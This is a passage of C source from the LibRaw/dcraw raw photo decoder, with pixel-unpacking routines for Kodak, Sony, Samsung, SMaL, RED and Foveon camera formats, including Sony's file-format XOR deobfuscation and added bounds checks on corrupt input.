while (trow < raw_height) {
fseek (ifp, save+=4, SEEK_SET);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
if(libraw_internal_data.internal_data.input->jpeg_src(&cinfo) == -1)
{
jpeg_destroy_decompress(&cinfo);
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
#else
jpeg_stdio_src (&cinfo, ifp);
#endif
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, cinfo.output_width*3, 1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (cinfo.output_scanline < cinfo.output_height &&
(row = trow + cinfo.output_scanline) < height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < cinfo.output_width && tcol+col < width; col++) {
FORC3 image[row*width+tcol+col][c] = cur[c][pixel[col][c]];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
jpeg_destroy_decompress (&cinfo);
throw;
}
#endif
jpeg_abort_decompress (&cinfo);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
}
jpeg_destroy_decompress (&cinfo);
maximum = 0xffff;
}
#endif
void CLASS kodak_dc120_load_raw()
{
static const int mul[4] = { 162, 192, 187, 92 };
static const int add[4] = { 0, 636, 424, 212 };
uchar pixel[848];
int row, shift, col;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 848, ifp) < 848) derror();
shift = row * mul[row & 3] + add[row & 3];
for (col=0; col < width; col++)
RAW(row,col) = (ushort) pixel[(col + shift) % 848];
}
maximum = 0xff;
}
void CLASS eight_bit_load_raw()
{
uchar *pixel;
unsigned row, col;
pixel = (uchar *) calloc (raw_width, sizeof *pixel);
merror (pixel, "eight_bit_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, raw_width, ifp) < raw_width) derror();
for (col=0; col < raw_width; col++)
RAW(row,col) = curve[pixel[col]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c330_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 2*sizeof *pixel);
merror (pixel, "kodak_c330_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, raw_width, 2, ifp) < 2) derror();
if (load_flags && (row & 31) == 31)
fseek (ifp, raw_width*32, SEEK_CUR);
for (col=0; col < width; col++) {
y = pixel[col*2];
cb = pixel[(col*2 & -4) | 1] - 128;
cr = pixel[(col*2 & -4) | 3] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c603_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 3*sizeof *pixel);
merror (pixel, "kodak_c603_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (~row & 1)
if (fread (pixel, raw_width, 3, ifp) < 3) derror();
for (col=0; col < width; col++) {
y = pixel[width*2*(row & 1) + col];
cb = pixel[width + (col & -2)] - 128;
cr = pixel[width + (col & -2)+1] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_262_load_raw()
{
static const uchar kodak_tree[2][26] =
{ { 0,1,5,1,1,2,0,0,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 },
{ 0,3,1,1,1,1,1,2,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 } };
ushort *huff[2];
uchar *pixel;
int *strip, ns, c, row, col, chess, pi=0, pi1, pi2, pred, val;
FORC(2) huff[c] = make_decoder (kodak_tree[c]);
ns = (raw_height+63) >> 5;
pixel = (uchar *) malloc (raw_width*32 + ns*4);
merror (pixel, "kodak_262_load_raw()");
strip = (int *) (pixel + raw_width*32);
order = 0x4d4d;
FORC(ns) strip[c] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if ((row & 31) == 0) {
fseek (ifp, strip[row >> 5], SEEK_SET);
getbits(-1);
pi = 0;
}
for (col=0; col < raw_width; col++) {
chess = (row + col) & 1;
pi1 = chess ? pi-2 : pi-raw_width-1;
pi2 = chess ? pi-2*raw_width : pi-raw_width+1;
if (col <= chess) pi1 = -1;
if (pi1 < 0) pi1 = pi2;
if (pi2 < 0) pi2 = pi1;
if (pi1 < 0 && col > 1) pi1 = pi2 = pi-2;
pred = (pi1 < 0) ? 0 : (pixel[pi1] + pixel[pi2]) >> 1;
pixel[pi] = val = pred + ljpeg_diff (huff[chess]);
if (val >> 8) derror();
val = curve[pixel[pi++]];
RAW(row,col) = val;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
FORC(2) free (huff[c]);
}
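/* Kodak 65000-series entropy coder: per-sample bit lengths are packed two
   to a byte, followed by the variable-length differences; if any length
   exceeds 12 the block is actually stored as packed 12-bit samples
   (groups of six shorts) and 1 is returned so the caller skips the
   predictor. */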
int CLASS kodak_65000_decode (short *out, int bsize)
{
uchar c, blen[768];
ushort raw[6];
INT64 bitbuf=0;
int save, bits=0, i, j, len, diff;
save = ftell(ifp);
bsize = (bsize + 3) & -4;
for (i=0; i < bsize; i+=2) {
c = fgetc(ifp);
if ((blen[i ] = c & 15) > 12 ||
(blen[i+1] = c >> 4) > 12 ) {
fseek (ifp, save, SEEK_SET);
for (i=0; i < bsize; i+=8) {
read_shorts (raw, 6);
out[i ] = raw[0] >> 12 << 8 | raw[2] >> 12 << 4 | raw[4] >> 12;
out[i+1] = raw[1] >> 12 << 8 | raw[3] >> 12 << 4 | raw[5] >> 12;
for (j=0; j < 6; j++)
out[i+2+j] = raw[j] & 0xfff;
}
return 1;
}
}
if ((bsize & 7) == 4) {
bitbuf = fgetc(ifp) << 8;
bitbuf += fgetc(ifp);
bits = 16;
}
for (i=0; i < bsize; i++) {
len = blen[i];
if (bits < len) {
for (j=0; j < 32; j+=8)
bitbuf += (INT64) fgetc(ifp) << (bits+(j^8));
bits += 32;
}
diff = bitbuf & (0xffff >> (16-len));
bitbuf >>= len;
bits -= len;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
out[i] = diff;
}
return 0;
}
void CLASS kodak_65000_load_raw()
{
short buf[272]; /* extra room for data stored w/o predictor */
int row, col, len, pred[2], ret, i;
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
pred[0] = pred[1] = 0;
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len);
for (i=0; i < len; i++)
{
int idx = ret ? buf[i] : (pred[i & 1] += buf[i]);
if(idx >=0 && idx <= 0xffff)
{
if ((RAW(row,col+i) = curve[idx]) >> 12) derror();
}
else
derror();
}
}
}
}
void CLASS kodak_ycbcr_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[384], *bp;
int row, col, len, c, i, j, k, y[2][2], cb, cr, rgb[3];
ushort *ip;
if (!image) return;
unsigned int bits = (load_flags && load_flags > 9 && load_flags < 17)?load_flags:10;
for (row=0; row < height; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=128) {
len = MIN (128, width-col);
kodak_65000_decode (buf, len*3);
y[0][1] = y[1][1] = cb = cr = 0;
for (bp=buf, i=0; i < len; i+=2, bp+=2) {
cb += bp[4];
cr += bp[5];
rgb[1] = -((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
for (j=0; j < 2; j++)
for (k=0; k < 2; k++) {
if ((y[j][k] = y[j][k^1] + *bp++) >> bits) derror();
ip = image[(row+j)*width + col+i+k];
FORC3 ip[c] = curve[LIM(y[j][k]+rgb[c], 0, 0xfff)];
}
}
}
}
}
void CLASS kodak_rgb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[768], *bp;
int row, col, len, c, i, rgb[3],ret;
ushort *ip=image[0];
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len*3);
memset (rgb, 0, sizeof rgb);
for (bp=buf, i=0; i < len; i++, ip+=4)
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags == 12)
{
FORC3 ip[c] = ret ? (*bp++) : (rgb[c] += *bp++);
}
else
#endif
FORC3 if ((ip[c] = ret ? (*bp++) : (rgb[c] += *bp++)) >> 12) derror();
}
}
}
void CLASS kodak_thumb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col;
colors = thumb_misc >> 5;
for (row=0; row < height; row++)
for (col=0; col < width; col++)
read_shorts (image[row*width+col], colors);
maximum = (1 << (thumb_misc & 31)) - 1;
}
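/* Sony raw obfuscation: on start a 128-word pad is seeded from the key
   with a linear-congruential step and expanded with shifted XOR terms;
   the data is then decoded by XOR-ing each word with a running
   lagged-XOR update of the pad. */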
void CLASS sony_decrypt (unsigned *data, int len, int start, int key)
{
#ifndef LIBRAW_NOTHREADS
#define pad tls->sony_decrypt.pad
#define p tls->sony_decrypt.p
#else
static unsigned pad[128], p;
#endif
if (start) {
for (p=0; p < 4; p++)
pad[p] = key = key * 48828125 + 1;
pad[3] = pad[3] << 1 | (pad[0]^pad[2]) >> 31;
for (p=4; p < 127; p++)
pad[p] = (pad[p-4]^pad[p-2]) << 1 | (pad[p-3]^pad[p-1]) >> 31;
for (p=0; p < 127; p++)
pad[p] = htonl(pad[p]);
}
while (len--)
{
*data++ ^= pad[p & 127] = pad[(p+1) & 127] ^ pad[(p+65) & 127];
p++;
}
#ifndef LIBRAW_NOTHREADS
#undef pad
#undef p
#endif
}
void CLASS sony_load_raw()
{
uchar head[40];
ushort *pixel;
unsigned i, key, row, col;
fseek (ifp, 200896, SEEK_SET);
fseek (ifp, (unsigned) fgetc(ifp)*4 - 1, SEEK_CUR);
order = 0x4d4d;
key = get4();
fseek (ifp, 164600, SEEK_SET);
fread (head, 1, 40, ifp);
sony_decrypt ((unsigned *) head, 10, 1, key);
for (i=26; i-- > 22; )
key = key << 8 | head[i];
fseek (ifp, data_offset, SEEK_SET);
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
if (fread (pixel, 2, raw_width, ifp) < raw_width) derror();
sony_decrypt ((unsigned *) pixel, raw_width/2, !row, key);
for (col=0; col < raw_width; col++)
if ((pixel[col] = ntohs(pixel[col])) >> 14) derror();
}
maximum = 0x3ff0;
}
void CLASS sony_arw_load_raw()
{
ushort huff[32770];
static const ushort tab[18] =
{ 0xf11,0xf10,0xe0f,0xd0e,0xc0d,0xb0c,0xa0b,0x90a,0x809,
0x708,0x607,0x506,0x405,0x304,0x303,0x300,0x202,0x201 };
int i, c, n, col, row, sum=0;
huff[0] = 15;
for (n=i=0; i < 18; i++)
FORC(32768 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (col = raw_width; col--; )
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (row=0; row < raw_height+1; row+=2) {
if (row == raw_height) row = 1;
if ((sum += ljpeg_diff(huff)) >> 12) derror();
if (row < height) RAW(row,col) = sum;
}
}
}
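/* Sony ARW 2.x compression: each 16-byte block codes 16 samples of one
   colour as an 11-bit max, 11-bit min, their 4-bit positions and fourteen
   7-bit deltas scaled by a shared shift. The LibRaw-only
   raw_processing_options branches expose base-only / delta-only views
   used for posterization analysis. */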
void CLASS sony_arw2_load_raw()
{
uchar *data, *dp;
ushort pix[16];
int row, col, val, max, min, imax, imin, sh, bit, i;
data = (uchar *) malloc (raw_width+1);
merror (data, "sony_arw2_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fread (data, 1, raw_width, ifp);
for (dp=data, col=0; col < raw_width-30; dp+=16) {
max = 0x7ff & (val = sget4(dp));
min = 0x7ff & val >> 11;
imax = 0x0f & val >> 22;
imin = 0x0f & val >> 26;
for (sh=0; sh < 4 && 0x80 << sh <= max-min; sh++);
#ifdef LIBRAW_LIBRARY_BUILD
/* select the unpacking variant from raw_processing_options once per 16-pixel block */
if(! (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_ALLFLAGS) // no flag set
|| (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_BASEONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else pix[i]=0;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAZEROBASE)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh);
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
#else
/* unaltered dcraw processing */
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
{
for (i=0; i < 16; i++, col+=2)
{
unsigned slope = pix[i] < 1001? 2 : curve[pix[i]<<1]-curve[(pix[i]<<1)-2];
unsigned step = 1 << sh;
RAW(row,col)=curve[pix[i]<<1]>black+imgdata.params.sony_arw2_posterization_thr?
LIM(((slope*step*1000)/(curve[pix[i]<<1]-black)),0,10000):0;
}
}
else
{
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1];
}
#else
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1] >> 2;
#endif
col -= col & 1 ? 1:31;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (data);
throw;
}
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
maximum=10000;
#endif
free (data);
}
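/* Samsung SRW (older compressed format): a strip table gives per-row
   offsets, op-codes adapt four code lengths, and each group of 16 pixels
   is predicted either from the row above (dir set) or from two columns
   back; a final pass swaps samples into the expected CFA order. */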
void CLASS samsung_load_raw()
{
int row, col, c, i, dir, op[4], len[4];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width > 32768 || raw_height > 32768) // definitely too large for these older Samsung models
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixels = raw_width*(raw_height+7);
order = 0x4949;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, strip_offset+row*4, SEEK_SET);
fseek (ifp, data_offset+get4(), SEEK_SET);
ph1_bits(-1);
FORC4 len[c] = row < 2 ? 7:4;
for (col=0; col < raw_width; col+=16) {
dir = ph1_bits(1);
FORC4 op[c] = ph1_bits(2);
FORC4 switch (op[c]) {
case 3: len[c] = ph1_bits(4); break;
case 2: len[c]--; break;
case 1: len[c]++;
}
for (c = 0; c < 16; c += 2)
{
i = len[((c & 1) << 1) | (c >> 3)];
unsigned idest = RAWINDEX(row, col + c);
unsigned isrc = (dir ? RAWINDEX(row + (~c | -2), col + c) : col ? RAWINDEX(row, col + (c | -2)) : 0);
if(idest < maxpixels && isrc < maxpixels) // negative indices wrap to huge values, so one unsigned compare covers both bounds
RAW(row, col + c) = ((signed)ph1_bits(i) << (32 - i) >> (32 - i)) + (dir ? RAW(row + (~c | -2), col + c) : col ? RAW(row, col + (c | -2)) : 128);
else
derror();
if (c == 14)
c = -1;
}
}
}
for (row=0; row < raw_height-1; row+=2)
for (col=0; col < raw_width-1; col+=2)
SWAP (RAW(row,col+1), RAW(row+1,col));
}
void CLASS samsung2_load_raw()
{
static const ushort tab[14] =
{ 0x304,0x307,0x206,0x205,0x403,0x600,0x709,
0x80a,0x90b,0xa0c,0xa0d,0x501,0x408,0x402 };
ushort huff[1026], vpred[2][2] = {{0,0},{0,0}}, hpred[2];
int i, c, n, row, col, diff;
huff[0] = 10;
for (n=i=0; i < 14; i++)
FORC(1024 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
void CLASS samsung3_load_raw()
{
int opt, init, mag, pmode, row, tab, col, pred, diff, i, c;
ushort lent[3][2], len[4], *prow[2];
order = 0x4949;
fseek (ifp, 9, SEEK_CUR);
opt = fgetc(ifp);
init = (get2(),get2());
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, (data_offset-ftell(ifp)) & 15, SEEK_CUR);
ph1_bits(-1);
mag = 0; pmode = 7;
FORC(6) ((ushort *)lent)[c] = row < 2 ? 7:4;
prow[ row & 1] = &RAW(row-1,1-((row & 1) << 1)); // green
prow[~row & 1] = &RAW(row-2,0); // red and blue
for (tab=0; tab+15 < raw_width; tab+=16) {
if (~opt & 4 && !(tab & 63)) {
i = ph1_bits(2);
mag = i < 3 ? mag-'2'+"204"[i] : ph1_bits(12);
}
if (opt & 2)
pmode = 7 - 4*ph1_bits(1);
else if (!ph1_bits(1))
pmode = ph1_bits(3);
if (opt & 1 || !ph1_bits(1)) {
FORC4 len[c] = ph1_bits(2);
FORC4 {
i = ((row & 1) << 1 | (c & 1)) % 3;
len[c] = len[c] < 3 ? lent[i][0]-'1'+"120"[len[c]] : ph1_bits(4);
lent[i][0] = lent[i][1];
lent[i][1] = len[c];
}
}
FORC(16) {
col = tab + (((c & 7) << 1)^(c >> 3)^(row & 1));
pred = (pmode == 7 || row < 2)
? (tab ? RAW(row,tab-2+(col & 1)) : init)
: (prow[col & 1][col-'4'+"0224468"[pmode]] +
prow[col & 1][col-'4'+"0244668"[pmode]] + 1) >> 1;
diff = ph1_bits (i = len[c >> 2]);
if (diff >> (i-1)) diff -= 1 << i;
diff = diff * (mag*2+1) + mag;
RAW(row,col) = pred + diff;
}
}
}
}
#define HOLE(row) ((holes >> (((row) - raw_height) & 7)) & 1)
/* Kudos to Rich Taylor for figuring out SMaL's compression algorithm. */
void CLASS smal_decode_segment (unsigned seg[2][2], int holes)
{
uchar hist[3][13] = {
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 3, 3, 0, 0, 63, 47, 31, 15, 0 } };
int low, high=0xff, carry=0, nbits=8;
int pix, s, count, bin, next, i, sym[3];
uchar diff, pred[]={0,0};
ushort data=0, range=0;
fseek (ifp, seg[0][1]+1, SEEK_SET);
getbits(-1);
if (seg[1][0] > raw_width*raw_height)
seg[1][0] = raw_width*raw_height;
for (pix=seg[0][0]; pix < seg[1][0]; pix++) {
for (s=0; s < 3; s++) {
data = data << nbits | getbits(nbits);
if (carry < 0)
carry = (nbits += carry+1) < 1 ? nbits-1 : 0;
while (--nbits >= 0)
if ((data >> nbits & 0xff) == 0xff) break;
if (nbits > 0)
data = ((data & ((1 << (nbits-1)) - 1)) << 1) |
((data + (((data & (1 << (nbits-1)))) << 1)) & ((~0u) << nbits));
if (nbits >= 0) {
data += getbits(1);
carry = nbits - 8;
}
count = ((((data-range+1) & 0xffff) << 2) - 1) / (high >> 4);
for (bin=0; hist[s][bin+5] > count; bin++);
low = hist[s][bin+5] * (high >> 4) >> 2;
if (bin) high = hist[s][bin+4] * (high >> 4) >> 2;
high -= low;
for (nbits=0; high << nbits < 128; nbits++);
range = (range+low) << nbits;
high <<= nbits;
next = hist[s][1];
if (++hist[s][2] > hist[s][3]) {
next = (next+1) & hist[s][0];
hist[s][3] = (hist[s][next+4] - hist[s][next+5]) >> 2;
hist[s][2] = 1;
}
if (hist[s][hist[s][1]+4] - hist[s][hist[s][1]+5] > 1) {
if (bin < hist[s][1])
for (i=bin; i < hist[s][1]; i++) hist[s][i+5]--;
else if (next <= bin)
for (i=hist[s][1]; i < bin; i++) hist[s][i+5]++;
}
hist[s][1] = next;
sym[s] = bin;
}
diff = sym[2] << 5 | sym[1] << 2 | (sym[0] & 3);
if (sym[0] & 4)
diff = diff ? -diff : 0x80;
if (ftell(ifp) + 12 >= seg[1][1])
diff = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(pix>=raw_width*raw_height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
raw_image[pix] = pred[pix & 1] += diff;
if (!(pix & 1) && HOLE(pix / raw_width)) pix += 2;
}
maximum = 0xff;
}
void CLASS smal_v6_load_raw()
{
unsigned seg[2][2];
fseek (ifp, 16, SEEK_SET);
seg[0][0] = 0;
seg[0][1] = get2();
seg[1][0] = raw_width * raw_height;
seg[1][1] = INT_MAX;
smal_decode_segment (seg, 0);
}
int CLASS median4 (int *p)
{
int min, max, sum, i;
min = max = sum = p[0];
for (i=1; i < 4; i++) {
sum += p[i];
if (min > p[i]) min = p[i];
if (max < p[i]) max = p[i];
}
return (sum - min - max) >> 1;
}
void CLASS fill_holes (int holes)
{
int row, col, val[4];
for (row=2; row < height-2; row++) {
if (!HOLE(row)) continue;
for (col=1; col < width-1; col+=4) {
val[0] = RAW(row-1,col-1);
val[1] = RAW(row-1,col+1);
val[2] = RAW(row+1,col-1);
val[3] = RAW(row+1,col+1);
RAW(row,col) = median4(val);
}
for (col=2; col < width-2; col+=4)
if (HOLE(row-2) || HOLE(row+2))
RAW(row,col) = (RAW(row,col-2) + RAW(row,col+2)) >> 1;
else {
val[0] = RAW(row,col-2);
val[1] = RAW(row,col+2);
val[2] = RAW(row-2,col);
val[3] = RAW(row+2,col);
RAW(row,col) = median4(val);
}
}
}
void CLASS smal_v9_load_raw()
{
unsigned seg[256][2], offset, nseg, holes, i;
fseek (ifp, 67, SEEK_SET);
offset = get4();
nseg = (uchar) fgetc(ifp);
fseek (ifp, offset, SEEK_SET);
for (i=0; i < nseg*2; i++)
((unsigned *)seg)[i] = get4() + data_offset*(i & 1);
fseek (ifp, 78, SEEK_SET);
holes = fgetc(ifp);
fseek (ifp, 88, SEEK_SET);
seg[nseg][0] = raw_height * raw_width;
seg[nseg][1] = get4() + data_offset;
for (i=0; i < nseg; i++)
smal_decode_segment (seg+i, holes);
if (holes) fill_holes (holes);
}
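/* RED REDCODE frames (requires JasPer): the four half-resolution CFA
   planes are decoded from an embedded JPEG2000 stream, re-interleaved
   into a padded buffer with replicated borders, partially reconstructed
   from neighbouring samples, and mapped through curve[]. */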
void CLASS redcine_load_raw()
{
#ifndef NO_JASPER
int c, row, col;
jas_stream_t *in;
jas_image_t *jimg;
jas_matrix_t *jmat;
jas_seqent_t *data;
ushort *img, *pix;
jas_init();
#ifndef LIBRAW_LIBRARY_BUILD
in = jas_stream_fopen (ifname, "rb");
#else
in = (jas_stream_t*)ifp->make_jas_stream();
if(!in)
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
#endif
jas_stream_seek (in, data_offset+20, SEEK_SET);
jimg = jas_image_decode (in, -1, 0);
#ifndef LIBRAW_LIBRARY_BUILD
if (!jimg) longjmp (failure, 3);
#else
if(!jimg)
{
jas_stream_close (in);
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
}
#endif
jmat = jas_matrix_create (height/2, width/2);
merror (jmat, "redcine_load_raw()");
img = (ushort *) calloc ((height+2), (width+2)*2);
merror (img, "redcine_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
bool fastexitflag = false;
try {
#endif
FORC4 {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jas_image_readcmpt (jimg, c, 0, 0, width/2, height/2, jmat);
data = jas_matrix_getref (jmat, 0, 0);
for (row = c >> 1; row < height; row+=2)
for (col = c & 1; col < width; col+=2)
img[(row+1)*(width+2)+col+1] = data[(row/2)*(width/2)+col/2];
}
for (col=1; col <= width; col++) {
img[col] = img[2*(width+2)+col];
img[(height+1)*(width+2)+col] = img[(height-1)*(width+2)+col];
}
for (row=0; row < height+2; row++) {
img[row*(width+2)] = img[row*(width+2)+2];
img[(row+1)*(width+2)-1] = img[(row+1)*(width+2)-3];
}
for (row=1; row <= height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pix = img + row*(width+2) + (col = 1 + (FC(row,1) & 1));
for ( ; col <= width; col+=2, pix+=2) {
c = (((pix[0] - 0x800) << 3) +
pix[-(width+2)] + pix[width+2] + pix[-1] + pix[1]) >> 2;
pix[0] = LIM(c,0,4095);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = curve[img[(row+1)*(width+2)+col+1]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
fastexitflag=true;
}
#endif
free (img);
jas_matrix_destroy (jmat);
jas_image_destroy (jimg);
jas_stream_close (in);
#ifdef LIBRAW_LIBRARY_BUILD
if(fastexitflag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
#endif
}
//@end COMMON
/* RESTRICTED code starts here */
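/* Build the Foveon Huffman decode tree: the first call (code == 0) reads
   the code table from the file, then nodes are added recursively, one per
   code prefix, until a stored code matches or 26 bits are exhausted. */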
void CLASS foveon_decoder (unsigned size, unsigned code)
{
static unsigned huff[1024];
struct decode *cur;
int i, len;
if (!code) {
for (i=0; i < size; i++)
huff[i] = get4();
memset (first_decode, 0, sizeof first_decode);
free_decode = first_decode;
}
cur = free_decode++;
if (free_decode > first_decode+2048) {
fprintf (stderr,_("%s: decoder table overflow\n"), ifname);
longjmp (failure, 2);
}
if (code)
for (i=0; i < size; i++)
if (huff[i] == code) {
cur->leaf = i;
return;
}
if ((len = code >> 27) > 26) return;
code = (len+1) << 27 | (code & 0x3ffffff) << 1;
cur->branch[0] = free_decode;
foveon_decoder (size, code);
cur->branch[1] = free_decode;
foveon_decoder (size, code+1);
}
void CLASS foveon_thumb()
{
unsigned bwide, row, col, bitbuf=0, bit=1, c, i;
char *buf;
struct decode *dindex;
short pred[3];
bwide = get4();
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
if (bwide > 0) {
if (bwide < thumb_width*3) return;
buf = (char *) malloc (bwide);
merror (buf, "foveon_thumb()");
for (row=0; row < thumb_height; row++) {
fread (buf, 1, bwide, ifp);
fwrite (buf, 3, thumb_width, ofp);
}
free (buf);
return;
}
foveon_decoder (256, 0);
for (row=0; row < thumb_height; row++) {
